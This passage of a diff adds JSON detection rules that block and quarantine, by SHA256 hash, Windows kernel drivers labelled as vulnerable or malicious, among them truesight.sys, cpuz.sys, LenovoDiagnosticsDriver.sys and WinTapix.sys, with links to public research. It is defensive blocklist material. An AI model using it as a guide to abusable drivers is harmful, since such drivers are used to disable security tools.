+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de2b70f2-8a86-55fd-93a1-47daeaec9391",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491814Z",
+ "creation_date": "2026-03-23T11:45:31.491816Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491821Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72a39b2ab86f813db654400e4acafbde33f51c88e88a6ebd2ac3d6acbf159cd7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de2d9731-a682-5e8e-902c-4c8cb1e5f0bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811134Z",
+ "creation_date": "2026-03-23T11:45:31.811136Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811141Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "692c0ec8d824a93911e7bcf9b15ed43c497f5451b15adf9c1cfb62dc593582a2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de378d05-3ebd-5bf8-9961-b42b3adbd567",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620815Z",
+ "creation_date": "2026-03-23T11:45:29.620817Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620823Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "db90e554ad249c2bd888282ecf7d8da4d1538dd364129a3327b54f8242dd5653",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de37e3e3-94b4-5551-b00b-e021d9ee5b6e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985666Z",
+ "creation_date": "2026-03-23T11:45:29.985668Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985674Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f6c316e2385f2694d47e936b0ac4bc9b55e279d530dd5e805f0d963cb47c3c0d",
+ "comment": "Malicious Kernel Driver related to WINTAPIX (aka WinTapix.sys and SRVNET2.SYS) [https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de3b12bb-c5c8-54fe-b920-fa1b9ca90621",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150564Z",
+ "creation_date": "2026-03-23T11:45:31.150566Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150571Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "54945c8914963302136ec48806e040f9a1872ba09bb05eafe8f45bc48a075456",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de3e1f2b-97e2-560b-96f7-e47ed3377863",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141398Z",
+ "creation_date": "2026-03-23T11:45:31.141400Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141405Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "91a25cacb4483da51c27ec91da3afdd72e2574ae319155cc902cce29940ecaca",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de42e94b-82be-57d8-8a22-30faf2f01543",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810990Z",
+ "creation_date": "2026-03-23T11:45:31.810993Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810998Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ceab4c5188d05433959cb3524c9963d006e250c16f4c7cd9c9af7bdd56c969e4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de606bb0-6f3d-503b-ad46-b130bc5961ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487432Z",
+ "creation_date": "2026-03-23T11:45:31.487434Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487440Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "61bacf21287d587d3a362e88a79af872aac0e8795f0d4730031e87b448aa2ac2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de7c5027-fcde-59b1-8a05-3e64659254d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976137Z",
+ "creation_date": "2026-03-23T11:45:29.976139Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976145Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe",
+ "comment": "Vulnerable Lenovo Diagnostics driver (aka LenovoDiagnosticsDriver.sys) [CVE-2022-3699] [https://github.com/alfarom256/CVE-2022-3699] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de84eace-1153-584d-af0f-3e30c35d321c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152586Z",
+ "creation_date": "2026-03-23T11:45:31.152587Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152593Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "49ca61e32736c4c3792a2e69b6b075fbc31e08612e178d77e8bb8fc75f098e71",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de88b109-7c24-589e-af7d-2aced2b000ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144596Z",
+ "creation_date": "2026-03-23T11:45:32.144598Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144604Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39171fcaff172d6b38762acef3d3352f9a375e3db7e54a7b51261a53b3c94266",
+ "comment": "Vulnerable Kernel Driver (aka RtsUer.sys) [https://www.loldrivers.io/drivers/71d930a7-3465-4d27-90d4-2a1a08bebb92/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de8c5c97-6c1a-5bc4-8279-99c8a6efdc1e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144819Z",
+ "creation_date": "2026-03-23T11:45:32.144822Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144827Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c4020e95f8a69522e400d3b14bf1be4fec2e7db0597626fbd8f8c3c1e85bffa0",
+ "comment": "Vulnerable Kernel Driver (aka ViveRRAudio.sys) [https://www.loldrivers.io/drivers/4cb95b41-43b4-4806-b536-ae5fd8c76b0e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de8e3bd4-c117-5bfd-9b80-8ff7735e75dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143760Z",
+ "creation_date": "2026-03-23T11:45:32.143762Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143768Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9923b3d6e508aa2086c66b36038b37206b0f8d26beaf87022290a2b574c2e047",
+ "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "de96730d-2f81-5395-8491-7fc2e52cdabd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822580Z",
+ "creation_date": "2026-03-23T11:45:31.822584Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822592Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e8aee9dc95134e49bb19bcf0925addda60372b99dc2ffde0dea68f3573672a98",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dea69269-2a2d-5162-baf5-53c07088537f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981820Z",
+ "creation_date": "2026-03-23T11:45:29.981822Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981828Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4e3887f950bff034efedd40f1e949579854a24140128246fa6141f2c34de6017",
+ "comment": "Vulnerable Kernel Driver (aka TestBone.sys) [https://www.loldrivers.io/drivers/be4843ef-a2a8-4a0d-91c6-42e165800bb0/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "deade94f-becd-592b-be1a-d471ad088f4e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140209Z",
+ "creation_date": "2026-03-23T11:45:31.140211Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140218Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82b4876716782349f4b7c6d1b0d7041e3e3b4c38d19a9579f1a7cfb11822840c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "deae422d-9300-5f6b-b962-ee24233201ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159535Z",
+ "creation_date": "2026-03-23T11:45:31.159537Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159543Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "817aa0ff85446b1420c5608910004a7f379afc67890d36089d2ed7e1aa5757ce",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "deb09886-6c52-500e-a382-1f4c8256201d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967676Z",
+ "creation_date": "2026-03-23T11:45:29.967678Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967683Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c283d02dfdae3e67fbfe7a70f1fc94dd164b0d2e6a905098acd697ff826b707d",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "deb87e89-a127-5b12-a3ee-199c88c45bae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456566Z",
+ "creation_date": "2026-03-23T11:45:30.456569Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456578Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ea5f339b2e40dea57378626790ca7e9a82777aacdada5bc61ebb7d82043fa07",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "debee8ea-934a-589b-b15f-afee6c9f9a6b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147553Z",
+ "creation_date": "2026-03-23T11:45:31.147555Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147560Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cbef55713e8f6db9a0a7bcb71f1599ac663a947911ec1a87693ce6c26bc4cf90",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dec7590e-c033-5748-b5bd-f298b2593674",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146456Z",
+ "creation_date": "2026-03-23T11:45:31.146458Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146464Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aea434cd31c278819342851c8769847a75376273bb214f2d19082e0a55e1ab14",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "decb5842-e730-577a-bc26-f2dd83b433a9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979743Z",
+ "creation_date": "2026-03-23T11:45:29.979745Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979751Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "948735962436df24baa69e58421345d4a295e0821f4f93fd9f64e11f51a9666f",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ded0bd6b-5f87-57ce-8efd-578d6781bca1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
